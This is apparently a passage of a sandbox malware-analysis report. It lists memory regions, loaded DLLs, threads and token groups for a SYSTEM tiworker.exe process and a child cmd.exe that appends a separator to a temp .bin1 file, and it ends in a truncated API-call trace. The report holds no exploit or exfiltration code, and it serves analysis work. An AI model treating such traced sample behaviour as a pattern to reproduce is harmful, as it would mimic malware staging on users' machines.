0x7ff9741d0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2501 start_va = 0x7ff974340000 end_va = 0x7ff97434afff entry_point = 0x7ff974340000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2502 start_va = 0x7ff974720000 end_va = 0x7ff97478afff entry_point = 0x7ff974720000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2503 start_va = 0x7ff9748a0000 end_va = 0x7ff9748c7fff entry_point = 0x7ff9748a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2504 start_va = 0x7ff9749a0000 end_va = 0x7ff9749aefff entry_point = 0x7ff9749a0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2505 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2506 start_va = 0x7ff9757b0000 end_va = 0x7ff9758fdfff entry_point = 0x7ff9757b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2507 start_va = 0x7ff976f80000 end_va = 0x7ff977025fff entry_point = 0x7ff976f80000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2508 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2509 start_va = 0x7ff9774c0000 end_va = 0x7ff977644fff entry_point = 0x7ff9774c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2510 start_va = 0x7ff9776c0000 end_va = 0x7ff97771afff entry_point = 0x7ff9776c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2511 start_va = 0x7ff977760000 end_va = 0x7ff97781dfff entry_point = 0x7ff977760000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2512 start_va = 0x7ff977830000 end_va = 0x7ff977aabfff entry_point = 0x7ff977830000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2513 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2514 start_va = 0x7ff977d40000 end_va = 0x7ff977de4fff entry_point = 0x7ff977d40000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2515 start_va = 0x7ff977df0000 end_va = 0x7ff977f15fff entry_point = 0x7ff977df0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2516 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2517 start_va = 0x7ff96f230000 end_va = 0x7ff96f23efff entry_point = 0x7ff96f230000 region_type = mapped_file name = "cbsapi.dll" filename = "\\Windows\\servicing\\CbsApi.dll" (normalized: "c:\\windows\\servicing\\cbsapi.dll") Thread: id = 212 os_tid = 0x2d0 Thread: id = 213 os_tid = 0x3c4 Thread: id = 214 os_tid = 0x3a4 Thread: id = 215 os_tid = 0x27c Thread: id = 216 os_tid = 0x274 Thread: id = 217 os_tid = 0xb78 Thread: id = 218 os_tid = 0xb74 Thread: id = 225 os_tid = 0x1c4 Process: id = "22" image_name = "tiworker.exe" filename = "c:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16384_none_115fd2f761f7c508\\tiworker.exe" page_root = "0x376d7000" os_pid = "0x58c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "21" os_parent_pid = "0xb88" cmd_line = "C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16384_none_115fd2f761f7c508\\TiWorker.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\TrustedInstaller" [0xe], "NT AUTHORITY\\Logon Session 00000000:0003ce24" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2518 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2519 start_va = 0x631add0000 end_va = 0x631addffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000631add0000" filename = "" Region: id = 2520 start_va = 0x631ade0000 end_va = 0x631ade6fff entry_point = 0x0 region_type = private name = "private_0x000000631ade0000" filename = "" Region: id = 2521 start_va = 0x631adf0000 end_va = 0x631ae03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000631adf0000" filename = "" Region: id = 2522 start_va = 0x631ae10000 end_va = 0x631ae8ffff entry_point = 0x0 region_type = private name = "private_0x000000631ae10000" filename = "" Region: id = 2523 start_va = 0x631ae90000 end_va = 0x631ae93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000631ae90000" filename = "" Region: id = 2524 start_va = 0x631aea0000 end_va = 0x631aea1fff entry_point = 0x0 region_type = private name = "private_0x000000631aea0000" filename = "" Region: id = 2525 start_va = 0x631aeb0000 end_va = 0x631af6dfff entry_point = 0x631aeb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2526 start_va = 0x631af70000 end_va = 0x631af76fff entry_point = 0x0 region_type = private name = "private_0x000000631af70000" filename = "" Region: id = 2527 start_va = 0x631af80000 end_va = 0x631af87fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000631af80000" filename = "" Region: id = 2528 start_va = 0x631af90000 end_va = 0x631b08ffff entry_point = 0x0 region_type = private name = "private_0x000000631af90000" filename = "" Region: id = 2529 start_va = 0x631b090000 end_va = 0x631b10ffff entry_point = 0x0 region_type = private name = "private_0x000000631b090000" filename = "" Region: id = 2530 start_va = 0x631b110000 end_va = 0x631b18ffff entry_point = 0x0 region_type = private name = "private_0x000000631b110000" filename = "" Region: id = 2531 start_va = 0x631b190000 end_va = 0x631b190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000631b190000" filename = "" Region: id = 2532 start_va = 0x631b1d0000 end_va = 0x631b1dffff entry_point = 0x0 region_type = private name = "private_0x000000631b1d0000" filename = "" Region: id = 2533 start_va = 0x631b1e0000 end_va = 0x631b516fff entry_point = 0x631b1e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2534 start_va = 0x631b520000 end_va = 0x631b59ffff entry_point = 0x0 region_type = private name = "private_0x000000631b520000" filename = "" Region: id = 2535 start_va = 0x631b5a0000 end_va = 0x631b61ffff entry_point = 0x0 region_type = private name = "private_0x000000631b5a0000" filename = "" Region: id = 2536 start_va = 0x7df5fff50000 end_va = 0x7ff5fff4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fff50000" filename = "" Region: id = 2537 start_va = 0x7ff696ae0000 end_va = 0x7ff696bdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff696ae0000" filename = "" Region: id = 2538 start_va = 0x7ff696be0000 end_va = 0x7ff696c02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff696be0000" filename = "" Region: id = 2539 start_va = 0x7ff696c04000 end_va = 0x7ff696c05fff entry_point = 0x0 region_type = private name = "private_0x00007ff696c04000" filename = "" Region: id = 2540 start_va = 0x7ff696c06000 end_va = 0x7ff696c06fff entry_point = 0x0 region_type = private name = "private_0x00007ff696c06000" filename = "" Region: id = 2541 start_va = 0x7ff696c08000 end_va = 0x7ff696c09fff entry_point = 0x0 region_type = private name = "private_0x00007ff696c08000" filename = "" Region: id = 2542 start_va = 0x7ff696c0a000 end_va = 0x7ff696c0bfff entry_point = 0x0 region_type = private name = "private_0x00007ff696c0a000" filename = "" Region: id = 2543 start_va = 0x7ff696c0c000 end_va = 0x7ff696c0dfff entry_point = 0x0 region_type = private name = "private_0x00007ff696c0c000" filename = "" Region: id = 2544 start_va = 0x7ff696c0e000 end_va = 0x7ff696c0ffff entry_point = 0x0 region_type = private name = "private_0x00007ff696c0e000" filename = "" Region: id = 2545 start_va = 0x7ff697a90000 end_va = 0x7ff697ac4fff entry_point = 0x7ff697a90000 region_type = mapped_file name = "tiworker.exe" filename = "\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16384_none_115fd2f761f7c508\\TiWorker.exe" (normalized: "c:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16384_none_115fd2f761f7c508\\tiworker.exe") Region: id = 2546 start_va = 0x7ff96a3c0000 end_va = 0x7ff96a549fff entry_point = 0x7ff96a3c0000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 2547 start_va = 0x7ff96c310000 end_va = 0x7ff96c350fff entry_point = 0x7ff96c310000 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16384_none_115fd2f761f7c508\\wdscore.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16384_none_115fd2f761f7c508\\wdscore.dll") Region: id = 2548 start_va = 0x7ff96c3c0000 end_va = 0x7ff96c3e4fff entry_point = 0x7ff96c3c0000 region_type = mapped_file name = "dbgcore.dll" filename = "\\Windows\\System32\\dbgcore.dll" (normalized: "c:\\windows\\system32\\dbgcore.dll") Region: id = 2549 start_va = 0x7ff96f230000 end_va = 0x7ff96f23efff entry_point = 0x7ff96f230000 region_type = mapped_file name = "cbsapi.dll" filename = "\\Windows\\servicing\\CbsApi.dll" (normalized: "c:\\windows\\servicing\\cbsapi.dll") Region: id = 2550 start_va = 0x7ff973e20000 end_va = 0x7ff973e52fff entry_point = 0x7ff973e20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2551 start_va = 0x7ff9741d0000 end_va = 0x7ff9741e6fff entry_point = 0x7ff9741d0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2552 start_va = 0x7ff974340000 end_va = 0x7ff97434afff entry_point = 0x7ff974340000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2553 start_va = 0x7ff974720000 end_va = 0x7ff97478afff entry_point = 0x7ff974720000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2554 start_va = 0x7ff9748a0000 end_va = 0x7ff9748c7fff entry_point = 0x7ff9748a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2555 start_va = 0x7ff9749a0000 end_va = 0x7ff9749aefff entry_point = 0x7ff9749a0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2556 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2557 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2558 start_va = 0x7ff9776c0000 end_va = 0x7ff97771afff entry_point = 0x7ff9776c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2559 start_va = 0x7ff977760000 end_va = 0x7ff97781dfff entry_point = 0x7ff977760000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2560 start_va = 0x7ff977830000 end_va = 0x7ff977aabfff entry_point = 0x7ff977830000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2561 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2562 start_va = 0x7ff977d40000 end_va = 0x7ff977de4fff entry_point = 0x7ff977d40000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2563 start_va = 0x7ff977df0000 end_va = 0x7ff977f15fff entry_point = 0x7ff977df0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2564 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2565 start_va = 0x7ff960a30000 end_va = 0x7ff960c16fff entry_point = 0x7ff960a30000 region_type = mapped_file name = "cbscore.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16384_none_115fd2f761f7c508\\CbsCore.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16384_none_115fd2f761f7c508\\cbscore.dll") Region: id = 2566 start_va = 0x7ff973ca0000 end_va = 0x7ff973cd1fff entry_point = 0x7ff973ca0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2567 start_va = 0x7ff974000000 end_va = 0x7ff97401efff entry_point = 0x7ff974000000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2568 start_va = 0x7ff974960000 end_va = 0x7ff974970fff entry_point = 0x7ff974960000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2569 start_va = 0x7ff974980000 end_va = 0x7ff974992fff entry_point = 0x7ff974980000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2570 start_va = 0x7ff974a00000 end_va = 0x7ff974bc0fff entry_point = 0x7ff974a00000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2571 start_va = 0x7ff9755b0000 end_va = 0x7ff9755f3fff entry_point = 0x7ff9755b0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2572 start_va = 0x7ff976f80000 end_va = 0x7ff977025fff entry_point = 0x7ff976f80000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2573 start_va = 0x631b1a0000 end_va = 0x631b1a0fff entry_point = 0x0 region_type = private name = "private_0x000000631b1a0000" filename = "" Region: id = 2574 start_va = 0x631b1b0000 end_va = 0x631b1b0fff entry_point = 0x0 region_type = private name = "private_0x000000631b1b0000" filename = "" Region: id = 2575 start_va = 0x631b620000 end_va = 0x631b7a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000631b620000" filename = "" Region: id = 2576 start_va = 0x631b7b0000 end_va = 0x631b930fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000631b7b0000" filename = "" Region: id = 2577 start_va = 0x631b940000 end_va = 0x631b9fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000631b940000" filename = "" Region: id = 2578 start_va = 0x7ff96d940000 end_va = 0x7ff96d984fff entry_point = 0x7ff96d940000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 2579 start_va = 0x7ff9757b0000 end_va = 0x7ff9758fdfff entry_point = 0x7ff9757b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2580 start_va = 0x7ff9774c0000 end_va = 0x7ff977644fff entry_point = 0x7ff9774c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2581 start_va = 0x7ff977030000 end_va = 0x7ff9771f4fff entry_point = 0x7ff977030000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2582 start_va = 0x7ff974bd0000 end_va = 0x7ff974c23fff entry_point = 0x7ff974bd0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2583 start_va = 0x631b1c0000 end_va = 0x631b1ccfff entry_point = 0x631b1c0000 region_type = mapped_file name = "cbsmsg.dll" filename = "\\Windows\\servicing\\CbsMsg.dll" (normalized: "c:\\windows\\servicing\\cbsmsg.dll") Region: id = 2584 start_va = 0x7ff96bd30000 end_va = 0x7ff96bdb1fff entry_point = 0x7ff96bd30000 region_type = mapped_file name = "dpx.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16384_none_115fd2f761f7c508\\dpx.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16384_none_115fd2f761f7c508\\dpx.dll") Region: id = 2585 start_va = 0x7ff960710000 end_va = 0x7ff960a2dfff entry_point = 0x7ff960710000 region_type = mapped_file name = "wcp.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16384_none_115fd2f761f7c508\\wcp.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16384_none_115fd2f761f7c508\\wcp.dll") Region: id = 2586 start_va = 0x7ff96bcd0000 end_va = 0x7ff96bd24fff entry_point = 0x7ff96bcd0000 region_type = mapped_file name = "drupdate.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16384_none_115fd2f761f7c508\\DrUpdate.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16384_none_115fd2f761f7c508\\drupdate.dll") Region: id = 2587 start_va = 0x7ff96c280000 end_va = 0x7ff96c2c8fff entry_point = 0x7ff96c280000 region_type = mapped_file name = "spp.dll" filename = "\\Windows\\System32\\spp.dll" (normalized: "c:\\windows\\system32\\spp.dll") Region: id = 2588 start_va = 0x7ff96c380000 end_va = 0x7ff96c395fff entry_point = 0x7ff96c380000 region_type = mapped_file name = "srclient.dll" filename = "\\Windows\\System32\\srclient.dll" (normalized: "c:\\windows\\system32\\srclient.dll") Region: id = 2589 start_va = 0x7ff96e0e0000 end_va = 0x7ff96e0f7fff entry_point = 0x7ff96e0e0000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 2590 start_va = 0x7ff96e170000 end_va = 0x7ff96e2f2fff entry_point = 0x7ff96e170000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 2591 start_va = 0x7ff9749b0000 end_va = 0x7ff9749f9fff entry_point = 0x7ff9749b0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2592 start_va = 0x7ff976f70000 end_va = 0x7ff976f77fff entry_point = 0x7ff976f70000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2593 start_va = 0x7ff977b60000 end_va = 0x7ff977ca0fff entry_point = 0x7ff977b60000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2594 start_va = 0x7ff977cb0000 end_va = 0x7ff977d18fff entry_point = 0x7ff977cb0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Thread: id = 219 os_tid = 0x33c Thread: id = 220 os_tid = 0x51c Thread: id = 221 os_tid = 0x448 Thread: id = 222 os_tid = 0xb44 Thread: id = 223 os_tid = 0xb28 Thread: id = 224 os_tid = 0xb34 Process: id = "23" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x37fed000" os_pid = "0x198" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x834" cmd_line = "cmd /C \"echo -------- >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2602 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2603 start_va = 0x9343980000 end_va = 0x934399ffff entry_point = 0x0 region_type = private name = "private_0x0000009343980000" filename = "" Region: id = 2604 start_va = 0x93439a0000 end_va = 0x93439b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000093439a0000" filename = "" Region: id = 2605 start_va = 0x93439c0000 end_va = 0x9343abffff entry_point = 0x0 region_type = private name = "private_0x00000093439c0000" filename = "" Region: id = 2606 start_va = 0x9343ac0000 end_va = 0x9343ac3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009343ac0000" filename = "" Region: id = 2607 start_va = 0x9343ad0000 end_va = 0x9343ad0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009343ad0000" filename = "" Region: id = 2608 start_va = 0x9343ae0000 end_va = 0x9343ae1fff entry_point = 0x0 region_type = private name = "private_0x0000009343ae0000" filename = "" Region: id = 2609 start_va = 0x7df5ff2b0000 end_va = 0x7ff5ff2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff2b0000" filename = "" Region: id = 2610 start_va = 0x7ff60d890000 end_va = 0x7ff60d8b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff60d890000" filename = "" Region: id = 2611 start_va = 0x7ff60d8bd000 end_va = 0x7ff60d8befff entry_point = 0x0 region_type = private name = "private_0x00007ff60d8bd000" filename = "" Region: id = 2612 start_va = 0x7ff60d8bf000 end_va = 0x7ff60d8bffff entry_point = 0x0 region_type = private name = "private_0x00007ff60d8bf000" filename = "" Region: id = 2613 start_va = 0x7ff60d9c0000 end_va = 0x7ff60da18fff entry_point = 0x7ff60d9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 2614 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2615 start_va = 0x9343bb0000 end_va = 0x9343caffff entry_point = 0x0 region_type = private name = "private_0x0000009343bb0000" filename = "" Region: id = 2616 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2617 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2657 start_va = 0x9343980000 end_va = 0x934398ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009343980000" filename = "" Region: id = 2658 start_va = 0x9343990000 end_va = 0x9343996fff entry_point = 0x0 region_type = private name = "private_0x0000009343990000" filename = "" Region: id = 2659 start_va = 0x9343af0000 end_va = 0x9343badfff entry_point = 0x9343af0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2660 start_va = 0x9343cb0000 end_va = 0x9343daffff entry_point = 0x0 region_type = private name = "private_0x0000009343cb0000" filename = "" Region: id = 2661 start_va = 0x9343f10000 end_va = 0x9343f1ffff entry_point = 0x0 region_type = private name = "private_0x0000009343f10000" filename = "" Region: id = 2662 start_va = 0x7ff60d790000 end_va = 0x7ff60d88ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff60d790000" filename = "" Region: id = 2663 start_va = 0x7ff60d8bb000 end_va = 0x7ff60d8bcfff entry_point = 0x0 region_type = private name = "private_0x00007ff60d8bb000" filename = "" Region: id = 2664 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2665 start_va = 0x9343db0000 end_va = 0x9343db6fff entry_point = 0x0 region_type = private name = "private_0x0000009343db0000" filename = "" Thread: id = 226 os_tid = 0xb40 [0263.292] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff60d9c0000 [0263.292] __set_app_type (_Type=0x1) [0263.292] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff60d9d44a0) returned 0x0 [0263.293] __getmainargs (in: _Argc=0x7ff60d9ef0e8, _Argv=0x7ff60d9ef0f0, _Env=0x7ff60d9ef0f8, _DoWildCard=0, _StartInfo=0x7ff60d9ef104 | out: _Argc=0x7ff60d9ef0e8, _Argv=0x7ff60d9ef0f0, _Env=0x7ff60d9ef0f8) returned 0 [0263.293] GetCurrentThreadId () returned 0xb40 [0263.293] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb40) returned 0x6c [0263.293] 